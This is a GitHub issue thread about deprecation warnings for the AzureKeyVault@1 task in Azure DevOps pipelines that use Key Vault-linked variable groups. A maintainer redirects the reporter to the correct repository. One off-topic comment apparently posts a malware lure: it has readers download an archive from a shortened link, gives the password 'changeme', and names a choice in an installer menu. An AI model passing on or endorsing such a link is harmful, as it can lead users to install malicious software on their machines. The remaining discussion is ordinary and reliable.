### ISSUE TITLE
When building using azure devops with a library linked to azure keyvault I get ##[warning]The AzureKeyVault@1 task is deprecated, please use the latest version of the AzureKeyVault task

### ISSUE THREAD

**Issue by CZEMacLeod** [microsoft/azure-devops-extension-tasks#985]
I am not directly using this task in my pipeline, but I have a variable group linked to a library linked to azure key vault.

I assume this is generating some pre-tasks in the job initialization step.

```
##[warning]Task 'Azure Key Vault' version 1 (AzureKeyVault@1) is deprecated.
##[warning]The AzureKeyVault@1 task is deprecated, please use the latest version of the AzureKeyVault task
```

Not sure I can do anything to actually use the newer version...

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jessehouwing** [comment]
This repository is only for the specific tasks used to publish extensions to the Azure DevOps marketplace.

**Comment by CZEMacLeod** [comment]
@jessehouwing Fine - but there are hundreds of repo's here and this looked like the most likely by name. Any idea where I should raise this?

**Comment by jessehouwing** [comment]
> @jessehouwing Fine - but there are hundreds of repo's here and this looked like the most likely by name. Any idea where I should raise this?

 * https://developercommunity.visualstudio.com/AzureDevOps
 * https://github.com/microsoft/azure-pipelines-tasks

**Comment by CZEMacLeod** [comment]
Thanks - found the existing issue https://github.com/microsoft/azure-pipelines-tasks/issues/20302
Looks like it will be fixed soon(ish).
